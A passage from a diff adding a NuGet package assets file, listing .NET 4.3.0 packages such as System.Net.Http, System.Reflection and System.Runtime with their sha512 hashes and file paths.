"ref/net46/it/System.Net.Http.xml", + "ref/net46/ja/System.Net.Http.xml", + "ref/net46/ko/System.Net.Http.xml", + "ref/net46/ru/System.Net.Http.xml", + "ref/net46/zh-hans/System.Net.Http.xml", + "ref/net46/zh-hant/System.Net.Http.xml", + "ref/netcore50/System.Net.Http.dll", + "ref/netcore50/System.Net.Http.xml", + "ref/netcore50/de/System.Net.Http.xml", + "ref/netcore50/es/System.Net.Http.xml", + "ref/netcore50/fr/System.Net.Http.xml", + "ref/netcore50/it/System.Net.Http.xml", + "ref/netcore50/ja/System.Net.Http.xml", + "ref/netcore50/ko/System.Net.Http.xml", + "ref/netcore50/ru/System.Net.Http.xml", + "ref/netcore50/zh-hans/System.Net.Http.xml", + "ref/netcore50/zh-hant/System.Net.Http.xml", + "ref/netstandard1.1/System.Net.Http.dll", + "ref/netstandard1.1/System.Net.Http.xml", + "ref/netstandard1.1/de/System.Net.Http.xml", + "ref/netstandard1.1/es/System.Net.Http.xml", + "ref/netstandard1.1/fr/System.Net.Http.xml", + "ref/netstandard1.1/it/System.Net.Http.xml", + "ref/netstandard1.1/ja/System.Net.Http.xml", + "ref/netstandard1.1/ko/System.Net.Http.xml", + "ref/netstandard1.1/ru/System.Net.Http.xml", + "ref/netstandard1.1/zh-hans/System.Net.Http.xml", + "ref/netstandard1.1/zh-hant/System.Net.Http.xml", + "ref/netstandard1.3/System.Net.Http.dll", + "ref/netstandard1.3/System.Net.Http.xml", + "ref/netstandard1.3/de/System.Net.Http.xml", + "ref/netstandard1.3/es/System.Net.Http.xml", + "ref/netstandard1.3/fr/System.Net.Http.xml", + "ref/netstandard1.3/it/System.Net.Http.xml", + "ref/netstandard1.3/ja/System.Net.Http.xml", + "ref/netstandard1.3/ko/System.Net.Http.xml", + "ref/netstandard1.3/ru/System.Net.Http.xml", + "ref/netstandard1.3/zh-hans/System.Net.Http.xml", + "ref/netstandard1.3/zh-hant/System.Net.Http.xml", + "ref/portable-net45+win8+wpa81/_._", + "ref/win8/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "runtimes/unix/lib/netstandard1.6/System.Net.Http.dll", + "runtimes/win/lib/net46/System.Net.Http.dll", + "runtimes/win/lib/netcore50/System.Net.Http.dll", + "runtimes/win/lib/netstandard1.3/System.Net.Http.dll", + "system.net.http.4.3.0.nupkg.sha512", + "system.net.http.nuspec" + ] + }, + "System.Net.Primitives/4.3.0": { + "sha512": "qOu+hDwFwoZPbzPvwut2qATe3ygjeQBDQj91xlsaqGFQUI5i4ZnZb8yyQuLGpDGivEPIt8EJkd1BVzVoP31FXA==", + "type": "package", + "path": "system.net.primitives/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net45/_._", + "lib/portable-net45+win8+wp8+wpa81/_._", + "lib/win8/_._", + "lib/wp80/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net45/_._", + "ref/netcore50/System.Net.Primitives.dll", + "ref/netcore50/System.Net.Primitives.xml", + "ref/netcore50/de/System.Net.Primitives.xml", + "ref/netcore50/es/System.Net.Primitives.xml", + "ref/netcore50/fr/System.Net.Primitives.xml", + "ref/netcore50/it/System.Net.Primitives.xml", + "ref/netcore50/ja/System.Net.Primitives.xml", + "ref/netcore50/ko/System.Net.Primitives.xml", + "ref/netcore50/ru/System.Net.Primitives.xml", + "ref/netcore50/zh-hans/System.Net.Primitives.xml", + "ref/netcore50/zh-hant/System.Net.Primitives.xml", + "ref/netstandard1.0/System.Net.Primitives.dll", + "ref/netstandard1.0/System.Net.Primitives.xml", + "ref/netstandard1.0/de/System.Net.Primitives.xml", + "ref/netstandard1.0/es/System.Net.Primitives.xml", + "ref/netstandard1.0/fr/System.Net.Primitives.xml", + "ref/netstandard1.0/it/System.Net.Primitives.xml", + "ref/netstandard1.0/ja/System.Net.Primitives.xml", + "ref/netstandard1.0/ko/System.Net.Primitives.xml", + "ref/netstandard1.0/ru/System.Net.Primitives.xml", + "ref/netstandard1.0/zh-hans/System.Net.Primitives.xml", + "ref/netstandard1.0/zh-hant/System.Net.Primitives.xml", + "ref/netstandard1.1/System.Net.Primitives.dll", + "ref/netstandard1.1/System.Net.Primitives.xml", + "ref/netstandard1.1/de/System.Net.Primitives.xml", + "ref/netstandard1.1/es/System.Net.Primitives.xml", + "ref/netstandard1.1/fr/System.Net.Primitives.xml", + "ref/netstandard1.1/it/System.Net.Primitives.xml", + "ref/netstandard1.1/ja/System.Net.Primitives.xml", + "ref/netstandard1.1/ko/System.Net.Primitives.xml", + "ref/netstandard1.1/ru/System.Net.Primitives.xml", + "ref/netstandard1.1/zh-hans/System.Net.Primitives.xml", + "ref/netstandard1.1/zh-hant/System.Net.Primitives.xml", + "ref/netstandard1.3/System.Net.Primitives.dll", + "ref/netstandard1.3/System.Net.Primitives.xml", + "ref/netstandard1.3/de/System.Net.Primitives.xml", + "ref/netstandard1.3/es/System.Net.Primitives.xml", + "ref/netstandard1.3/fr/System.Net.Primitives.xml", + "ref/netstandard1.3/it/System.Net.Primitives.xml", + "ref/netstandard1.3/ja/System.Net.Primitives.xml", + "ref/netstandard1.3/ko/System.Net.Primitives.xml", + "ref/netstandard1.3/ru/System.Net.Primitives.xml", + "ref/netstandard1.3/zh-hans/System.Net.Primitives.xml", + "ref/netstandard1.3/zh-hant/System.Net.Primitives.xml", + "ref/portable-net45+win8+wp8+wpa81/_._", + "ref/win8/_._", + "ref/wp80/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.net.primitives.4.3.0.nupkg.sha512", + "system.net.primitives.nuspec" + ] + }, + "System.Net.Sockets/4.3.0": { + "sha512": "m6icV6TqQOAdgt5N/9I5KNpjom/5NFtkmGseEH+AK/hny8XrytLH3+b5M8zL/Ycg3fhIocFpUMyl/wpFnVRvdw==", + "type": "package", + "path": "system.net.sockets/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net46/System.Net.Sockets.dll", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net46/System.Net.Sockets.dll", + "ref/netstandard1.3/System.Net.Sockets.dll", + "ref/netstandard1.3/System.Net.Sockets.xml", + "ref/netstandard1.3/de/System.Net.Sockets.xml", + "ref/netstandard1.3/es/System.Net.Sockets.xml", + "ref/netstandard1.3/fr/System.Net.Sockets.xml", + "ref/netstandard1.3/it/System.Net.Sockets.xml", + "ref/netstandard1.3/ja/System.Net.Sockets.xml", + "ref/netstandard1.3/ko/System.Net.Sockets.xml", + "ref/netstandard1.3/ru/System.Net.Sockets.xml", + "ref/netstandard1.3/zh-hans/System.Net.Sockets.xml", + "ref/netstandard1.3/zh-hant/System.Net.Sockets.xml", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.net.sockets.4.3.0.nupkg.sha512", + "system.net.sockets.nuspec" + ] + }, + "System.ObjectModel/4.3.0": { + "sha512": "bdX+80eKv9bN6K4N+d77OankKHGn6CH711a6fcOpMQu2Fckp/Ft4L/kW9WznHpyR0NRAvJutzOMHNNlBGvxQzQ==", + "type": "package", + "path": "system.objectmodel/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net45/_._", + "lib/netcore50/System.ObjectModel.dll", + "lib/netstandard1.3/System.ObjectModel.dll", + "lib/portable-net45+win8+wp8+wpa81/_._", + "lib/win8/_._", + "lib/wp80/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net45/_._", + "ref/netcore50/System.ObjectModel.dll", + "ref/netcore50/System.ObjectModel.xml", + "ref/netcore50/de/System.ObjectModel.xml", + "ref/netcore50/es/System.ObjectModel.xml", + "ref/netcore50/fr/System.ObjectModel.xml", + "ref/netcore50/it/System.ObjectModel.xml", + "ref/netcore50/ja/System.ObjectModel.xml", + "ref/netcore50/ko/System.ObjectModel.xml", + "ref/netcore50/ru/System.ObjectModel.xml", + "ref/netcore50/zh-hans/System.ObjectModel.xml", + "ref/netcore50/zh-hant/System.ObjectModel.xml", + "ref/netstandard1.0/System.ObjectModel.dll", + "ref/netstandard1.0/System.ObjectModel.xml", + "ref/netstandard1.0/de/System.ObjectModel.xml", + "ref/netstandard1.0/es/System.ObjectModel.xml", + "ref/netstandard1.0/fr/System.ObjectModel.xml", + "ref/netstandard1.0/it/System.ObjectModel.xml", + "ref/netstandard1.0/ja/System.ObjectModel.xml", + "ref/netstandard1.0/ko/System.ObjectModel.xml", + "ref/netstandard1.0/ru/System.ObjectModel.xml", + "ref/netstandard1.0/zh-hans/System.ObjectModel.xml", + "ref/netstandard1.0/zh-hant/System.ObjectModel.xml", + "ref/netstandard1.3/System.ObjectModel.dll", + "ref/netstandard1.3/System.ObjectModel.xml", + "ref/netstandard1.3/de/System.ObjectModel.xml", + "ref/netstandard1.3/es/System.ObjectModel.xml", + "ref/netstandard1.3/fr/System.ObjectModel.xml", + "ref/netstandard1.3/it/System.ObjectModel.xml", + "ref/netstandard1.3/ja/System.ObjectModel.xml", + "ref/netstandard1.3/ko/System.ObjectModel.xml", + "ref/netstandard1.3/ru/System.ObjectModel.xml", + "ref/netstandard1.3/zh-hans/System.ObjectModel.xml", + "ref/netstandard1.3/zh-hant/System.ObjectModel.xml", + "ref/portable-net45+win8+wp8+wpa81/_._", + "ref/win8/_._", + "ref/wp80/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.objectmodel.4.3.0.nupkg.sha512", + "system.objectmodel.nuspec" + ] + }, + "System.Reflection/4.3.0": { + "sha512": "KMiAFoW7MfJGa9nDFNcfu+FpEdiHpWgTcS2HdMpDvt9saK3y/G4GwprPyzqjFH9NTaGPQeWNHU+iDlDILj96aQ==", + "type": "package", + "path": "system.reflection/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net45/_._", + "lib/net462/System.Reflection.dll", + "lib/portable-net45+win8+wp8+wpa81/_._", + "lib/win8/_._", + "lib/wp80/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net45/_._", + "ref/net462/System.Reflection.dll", + "ref/netcore50/System.Reflection.dll", + "ref/netcore50/System.Reflection.xml", + "ref/netcore50/de/System.Reflection.xml", + "ref/netcore50/es/System.Reflection.xml", + "ref/netcore50/fr/System.Reflection.xml", + "ref/netcore50/it/System.Reflection.xml", + "ref/netcore50/ja/System.Reflection.xml", + "ref/netcore50/ko/System.Reflection.xml", + "ref/netcore50/ru/System.Reflection.xml", + "ref/netcore50/zh-hans/System.Reflection.xml", + "ref/netcore50/zh-hant/System.Reflection.xml", + "ref/netstandard1.0/System.Reflection.dll", + "ref/netstandard1.0/System.Reflection.xml", + "ref/netstandard1.0/de/System.Reflection.xml", + "ref/netstandard1.0/es/System.Reflection.xml", + "ref/netstandard1.0/fr/System.Reflection.xml", + "ref/netstandard1.0/it/System.Reflection.xml", + "ref/netstandard1.0/ja/System.Reflection.xml", + "ref/netstandard1.0/ko/System.Reflection.xml", + "ref/netstandard1.0/ru/System.Reflection.xml", + "ref/netstandard1.0/zh-hans/System.Reflection.xml", + "ref/netstandard1.0/zh-hant/System.Reflection.xml", + "ref/netstandard1.3/System.Reflection.dll", + "ref/netstandard1.3/System.Reflection.xml", + "ref/netstandard1.3/de/System.Reflection.xml", + "ref/netstandard1.3/es/System.Reflection.xml", + "ref/netstandard1.3/fr/System.Reflection.xml", + "ref/netstandard1.3/it/System.Reflection.xml", + "ref/netstandard1.3/ja/System.Reflection.xml", + "ref/netstandard1.3/ko/System.Reflection.xml", + "ref/netstandard1.3/ru/System.Reflection.xml", + "ref/netstandard1.3/zh-hans/System.Reflection.xml", + "ref/netstandard1.3/zh-hant/System.Reflection.xml", + "ref/netstandard1.5/System.Reflection.dll", + "ref/netstandard1.5/System.Reflection.xml", + "ref/netstandard1.5/de/System.Reflection.xml", + "ref/netstandard1.5/es/System.Reflection.xml", + "ref/netstandard1.5/fr/System.Reflection.xml", + "ref/netstandard1.5/it/System.Reflection.xml", + "ref/netstandard1.5/ja/System.Reflection.xml", + "ref/netstandard1.5/ko/System.Reflection.xml", + "ref/netstandard1.5/ru/System.Reflection.xml", + "ref/netstandard1.5/zh-hans/System.Reflection.xml", + "ref/netstandard1.5/zh-hant/System.Reflection.xml", + "ref/portable-net45+win8+wp8+wpa81/_._", + "ref/win8/_._", + "ref/wp80/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.reflection.4.3.0.nupkg.sha512", + "system.reflection.nuspec" + ] + }, + "System.Reflection.Extensions/4.3.0": { + "sha512": "rJkrJD3kBI5B712aRu4DpSIiHRtr6QlfZSQsb0hYHrDCZORXCFjQfoipo2LaMUHoT9i1B7j7MnfaEKWDFmFQNQ==", + "type": "package", + "path": "system.reflection.extensions/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net45/_._", + "lib/portable-net45+win8+wp8+wpa81/_._", + "lib/win8/_._", + "lib/wp80/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net45/_._", + "ref/netcore50/System.Reflection.Extensions.dll", + "ref/netcore50/System.Reflection.Extensions.xml", + "ref/netcore50/de/System.Reflection.Extensions.xml", + "ref/netcore50/es/System.Reflection.Extensions.xml", + "ref/netcore50/fr/System.Reflection.Extensions.xml", + "ref/netcore50/it/System.Reflection.Extensions.xml", + "ref/netcore50/ja/System.Reflection.Extensions.xml", + "ref/netcore50/ko/System.Reflection.Extensions.xml", + "ref/netcore50/ru/System.Reflection.Extensions.xml", + "ref/netcore50/zh-hans/System.Reflection.Extensions.xml", + "ref/netcore50/zh-hant/System.Reflection.Extensions.xml", + "ref/netstandard1.0/System.Reflection.Extensions.dll", + "ref/netstandard1.0/System.Reflection.Extensions.xml", + "ref/netstandard1.0/de/System.Reflection.Extensions.xml", + "ref/netstandard1.0/es/System.Reflection.Extensions.xml", + "ref/netstandard1.0/fr/System.Reflection.Extensions.xml", + "ref/netstandard1.0/it/System.Reflection.Extensions.xml", + "ref/netstandard1.0/ja/System.Reflection.Extensions.xml", + "ref/netstandard1.0/ko/System.Reflection.Extensions.xml", + "ref/netstandard1.0/ru/System.Reflection.Extensions.xml", + "ref/netstandard1.0/zh-hans/System.Reflection.Extensions.xml", + "ref/netstandard1.0/zh-hant/System.Reflection.Extensions.xml", + "ref/portable-net45+win8+wp8+wpa81/_._", + "ref/win8/_._", + "ref/wp80/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.reflection.extensions.4.3.0.nupkg.sha512", + "system.reflection.extensions.nuspec" + ] + }, + "System.Reflection.Primitives/4.3.0": { + "sha512": "5RXItQz5As4xN2/YUDxdpsEkMhvw3e6aNveFXUn4Hl/udNTCNhnKp8lT9fnc3MhvGKh1baak5CovpuQUXHAlIA==", + "type": "package", + "path": "system.reflection.primitives/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net45/_._", + "lib/portable-net45+win8+wp8+wpa81/_._", + "lib/win8/_._", + "lib/wp80/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net45/_._", + "ref/netcore50/System.Reflection.Primitives.dll", + "ref/netcore50/System.Reflection.Primitives.xml", + "ref/netcore50/de/System.Reflection.Primitives.xml", + "ref/netcore50/es/System.Reflection.Primitives.xml", + "ref/netcore50/fr/System.Reflection.Primitives.xml", + "ref/netcore50/it/System.Reflection.Primitives.xml", + "ref/netcore50/ja/System.Reflection.Primitives.xml", + "ref/netcore50/ko/System.Reflection.Primitives.xml", + "ref/netcore50/ru/System.Reflection.Primitives.xml", + "ref/netcore50/zh-hans/System.Reflection.Primitives.xml", + "ref/netcore50/zh-hant/System.Reflection.Primitives.xml", + "ref/netstandard1.0/System.Reflection.Primitives.dll", + "ref/netstandard1.0/System.Reflection.Primitives.xml", + "ref/netstandard1.0/de/System.Reflection.Primitives.xml", + "ref/netstandard1.0/es/System.Reflection.Primitives.xml", + "ref/netstandard1.0/fr/System.Reflection.Primitives.xml", + "ref/netstandard1.0/it/System.Reflection.Primitives.xml", + "ref/netstandard1.0/ja/System.Reflection.Primitives.xml", + "ref/netstandard1.0/ko/System.Reflection.Primitives.xml", + "ref/netstandard1.0/ru/System.Reflection.Primitives.xml", + "ref/netstandard1.0/zh-hans/System.Reflection.Primitives.xml", + "ref/netstandard1.0/zh-hant/System.Reflection.Primitives.xml", + "ref/portable-net45+win8+wp8+wpa81/_._", + "ref/win8/_._", + "ref/wp80/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.reflection.primitives.4.3.0.nupkg.sha512", + "system.reflection.primitives.nuspec" + ] + }, + "System.Resources.ResourceManager/4.3.0": { + "sha512": "/zrcPkkWdZmI4F92gL/TPumP98AVDu/Wxr3CSJGQQ+XN6wbRZcyfSKVoPo17ilb3iOr0cCRqJInGwNMolqhS8A==", + "type": "package", + "path": "system.resources.resourcemanager/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net45/_._", + "lib/portable-net45+win8+wp8+wpa81/_._", + "lib/win8/_._", + "lib/wp80/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net45/_._", + "ref/netcore50/System.Resources.ResourceManager.dll", + "ref/netcore50/System.Resources.ResourceManager.xml", + "ref/netcore50/de/System.Resources.ResourceManager.xml", + "ref/netcore50/es/System.Resources.ResourceManager.xml", + "ref/netcore50/fr/System.Resources.ResourceManager.xml", + "ref/netcore50/it/System.Resources.ResourceManager.xml", + "ref/netcore50/ja/System.Resources.ResourceManager.xml", + "ref/netcore50/ko/System.Resources.ResourceManager.xml", + "ref/netcore50/ru/System.Resources.ResourceManager.xml", + "ref/netcore50/zh-hans/System.Resources.ResourceManager.xml", + "ref/netcore50/zh-hant/System.Resources.ResourceManager.xml", + "ref/netstandard1.0/System.Resources.ResourceManager.dll", + "ref/netstandard1.0/System.Resources.ResourceManager.xml", + "ref/netstandard1.0/de/System.Resources.ResourceManager.xml", + "ref/netstandard1.0/es/System.Resources.ResourceManager.xml", + "ref/netstandard1.0/fr/System.Resources.ResourceManager.xml", + "ref/netstandard1.0/it/System.Resources.ResourceManager.xml", + "ref/netstandard1.0/ja/System.Resources.ResourceManager.xml", + "ref/netstandard1.0/ko/System.Resources.ResourceManager.xml", + "ref/netstandard1.0/ru/System.Resources.ResourceManager.xml", + "ref/netstandard1.0/zh-hans/System.Resources.ResourceManager.xml", + "ref/netstandard1.0/zh-hant/System.Resources.ResourceManager.xml", + "ref/portable-net45+win8+wp8+wpa81/_._", + "ref/win8/_._", + "ref/wp80/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.resources.resourcemanager.4.3.0.nupkg.sha512", + "system.resources.resourcemanager.nuspec" + ] + }, + "System.Runtime/4.3.0": { + "sha512": "JufQi0vPQ0xGnAczR13AUFglDyVYt4Kqnz1AZaiKZ5+GICq0/1MH/mO/eAJHt/mHW1zjKBJd7kV26SrxddAhiw==", + "type": "package", + "path": "system.runtime/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net45/_._", + "lib/net462/System.Runtime.dll", + "lib/portable-net45+win8+wp80+wpa81/_._", + "lib/win8/_._", + "lib/wp80/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net45/_._", + "ref/net462/System.Runtime.dll", + "ref/netcore50/System.Runtime.dll", + "ref/netcore50/System.Runtime.xml", + "ref/netcore50/de/System.Runtime.xml", + "ref/netcore50/es/System.Runtime.xml", + "ref/netcore50/fr/System.Runtime.xml", + "ref/netcore50/it/System.Runtime.xml", + "ref/netcore50/ja/System.Runtime.xml", + "ref/netcore50/ko/System.Runtime.xml", + "ref/netcore50/ru/System.Runtime.xml", + "ref/netcore50/zh-hans/System.Runtime.xml", + "ref/netcore50/zh-hant/System.Runtime.xml", + "ref/netstandard1.0/System.Runtime.dll", + "ref/netstandard1.0/System.Runtime.xml", + "ref/netstandard1.0/de/System.Runtime.xml", + "ref/netstandard1.0/es/System.Runtime.xml", + "ref/netstandard1.0/fr/System.Runtime.xml", + "ref/netstandard1.0/it/System.Runtime.xml", + "ref/netstandard1.0/ja/System.Runtime.xml", + "ref/netstandard1.0/ko/System.Runtime.xml", + "ref/netstandard1.0/ru/System.Runtime.xml", + "ref/netstandard1.0/zh-hans/System.Runtime.xml", + "ref/netstandard1.0/zh-hant/System.Runtime.xml", + "ref/netstandard1.2/System.Runtime.dll", + "ref/netstandard1.2/System.Runtime.xml", + "ref/netstandard1.2/de/System.Runtime.xml", + "ref/netstandard1.2/es/System.Runtime.xml", + "ref/netstandard1.2/fr/System.Runtime.xml", + "ref/netstandard1.2/it/System.Runtime.xml", + "ref/netstandard1.2/ja/System.Runtime.xml", + "ref/netstandard1.2/ko/System.Runtime.xml", + "ref/netstandard1.2/ru/System.Runtime.xml", + "ref/netstandard1.2/zh-hans/System.Runtime.xml", + "ref/netstandard1.2/zh-hant/System.Runtime.xml", + "ref/netstandard1.3/System.Runtime.dll", + "ref/netstandard1.3/System.Runtime.xml", + "ref/netstandard1.3/de/System.Runtime.xml", + "ref/netstandard1.3/es/System.Runtime.xml", + "ref/netstandard1.3/fr/System.Runtime.xml", + "ref/netstandard1.3/it/System.Runtime.xml", + "ref/netstandard1.3/ja/System.Runtime.xml", + "ref/netstandard1.3/ko/System.Runtime.xml", + "ref/netstandard1.3/ru/System.Runtime.xml", + "ref/netstandard1.3/zh-hans/System.Runtime.xml", + "ref/netstandard1.3/zh-hant/System.Runtime.xml", + "ref/netstandard1.5/System.Runtime.dll", + "ref/netstandard1.5/System.Runtime.xml", + "ref/netstandard1.5/de/System.Runtime.xml", + "ref/netstandard1.5/es/System.Runtime.xml", + "ref/netstandard1.5/fr/System.Runtime.xml", + "ref/netstandard1.5/it/System.Runtime.xml", + "ref/netstandard1.5/ja/System.Runtime.xml", + "ref/netstandard1.5/ko/System.Runtime.xml", + "ref/netstandard1.5/ru/System.Runtime.xml", + "ref/netstandard1.5/zh-hans/System.Runtime.xml", + "ref/netstandard1.5/zh-hant/System.Runtime.xml", + "ref/portable-net45+win8+wp80+wpa81/_._", + "ref/win8/_._", + "ref/wp80/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.runtime.4.3.0.nupkg.sha512", + "system.runtime.nuspec" + ] + }, + "System.Runtime.Extensions/4.3.0": { + "sha512": "guW0uK0fn5fcJJ1tJVXYd7/1h5F+pea1r7FLSOz/f8vPEqbR2ZAknuRDvTQ8PzAilDveOxNjSfr0CHfIQfFk8g==", + "type": "package", + "path": "system.runtime.extensions/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net45/_._", + "lib/net462/System.Runtime.Extensions.dll", + "lib/portable-net45+win8+wp8+wpa81/_._", + "lib/win8/_._", + "lib/wp80/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net45/_._", + "ref/net462/System.Runtime.Extensions.dll", + "ref/netcore50/System.Runtime.Extensions.dll", + "ref/netcore50/System.Runtime.Extensions.xml", + "ref/netcore50/de/System.Runtime.Extensions.xml", + "ref/netcore50/es/System.Runtime.Extensions.xml", + "ref/netcore50/fr/System.Runtime.Extensions.xml", + "ref/netcore50/it/System.Runtime.Extensions.xml", + "ref/netcore50/ja/System.Runtime.Extensions.xml", + "ref/netcore50/ko/System.Runtime.Extensions.xml", + "ref/netcore50/ru/System.Runtime.Extensions.xml", + "ref/netcore50/zh-hans/System.Runtime.Extensions.xml", + "ref/netcore50/zh-hant/System.Runtime.Extensions.xml", + "ref/netstandard1.0/System.Runtime.Extensions.dll", + "ref/netstandard1.0/System.Runtime.Extensions.xml", + "ref/netstandard1.0/de/System.Runtime.Extensions.xml", + "ref/netstandard1.0/es/System.Runtime.Extensions.xml", + "ref/netstandard1.0/fr/System.Runtime.Extensions.xml", + "ref/netstandard1.0/it/System.Runtime.Extensions.xml", + "ref/netstandard1.0/ja/System.Runtime.Extensions.xml", + "ref/netstandard1.0/ko/System.Runtime.Extensions.xml", + "ref/netstandard1.0/ru/System.Runtime.Extensions.xml", + "ref/netstandard1.0/zh-hans/System.Runtime.Extensions.xml", + "ref/netstandard1.0/zh-hant/System.Runtime.Extensions.xml", + "ref/netstandard1.3/System.Runtime.Extensions.dll", + "ref/netstandard1.3/System.Runtime.Extensions.xml", + "ref/netstandard1.3/de/System.Runtime.Extensions.xml", + "ref/netstandard1.3/es/System.Runtime.Extensions.xml", + "ref/netstandard1.3/fr/System.Runtime.Extensions.xml", + "ref/netstandard1.3/it/System.Runtime.Extensions.xml", + "ref/netstandard1.3/ja/System.Runtime.Extensions.xml", + "ref/netstandard1.3/ko/System.Runtime.Extensions.xml", + "ref/netstandard1.3/ru/System.Runtime.Extensions.xml", + "ref/netstandard1.3/zh-hans/System.Runtime.Extensions.xml", + "ref/netstandard1.3/zh-hant/System.Runtime.Extensions.xml", + "ref/netstandard1.5/System.Runtime.Extensions.dll", + "ref/netstandard1.5/System.Runtime.Extensions.xml", + "ref/netstandard1.5/de/System.Runtime.Extensions.xml", + "ref/netstandard1.5/es/System.Runtime.Extensions.xml", + "ref/netstandard1.5/fr/System.Runtime.Extensions.xml", + "ref/netstandard1.5/it/System.Runtime.Extensions.xml", + "ref/netstandard1.5/ja/System.Runtime.Extensions.xml", + "ref/netstandard1.5/ko/System.Runtime.Extensions.xml", + "ref/netstandard1.5/ru/System.Runtime.Extensions.xml", + "ref/netstandard1.5/zh-hans/System.Runtime.Extensions.xml", + "ref/netstandard1.5/zh-hant/System.Runtime.Extensions.xml", + "ref/portable-net45+win8+wp8+wpa81/_._", + "ref/win8/_._", + "ref/wp80/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.runtime.extensions.4.3.0.nupkg.sha512", + "system.runtime.extensions.nuspec" + ] + }, + "System.Runtime.Handles/4.3.0": { + "sha512": "OKiSUN7DmTWeYb3l51A7EYaeNMnvxwE249YtZz7yooT4gOZhmTjIn48KgSsw2k2lYdLgTKNJw/ZIfSElwDRVgg==", + "type": "package", + "path": "system.runtime.handles/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net46/_._", + "lib/xamarinios10/_._", + 